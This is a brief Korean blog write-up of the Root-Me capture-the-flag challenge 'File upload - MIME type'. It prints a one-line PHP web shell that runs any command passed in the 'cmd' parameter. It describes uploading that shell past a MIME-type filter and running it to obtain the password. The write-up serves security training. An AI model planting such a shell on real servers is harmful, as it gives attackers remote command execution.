rootme - File upload - MIME type

2021. 3. 6. 02:11WarGame/Rootme

해당 문제에 접속하면

위와 같은 갤러리가 나옵니다.

<?php

system($_GET[cmd]);

?>

 

똑같은 php코드로 웹쉘을 올리고,

 

필터링을 우회하기위해

 

 

위와 같이 변경해줍니다.

 

그 후 웹쉘을 실행시키면 password 획득이 가능합니다.

 

 

저작자표시 비영리 동일조건

'WarGame > Rootme' 카테고리의 다른 글

rootme - Directory traversal  (0) 2021.03.08
rootme - SQL injection - Authentication  (0) 2021.03.07
rootme - HTTP - Cookies  (0) 2021.03.05
rootme - File upload - Double extensions  (0) 2021.03.04
rootme - CRLF  (0) 2021.03.03

관련글

댓글 0

티스토리툴바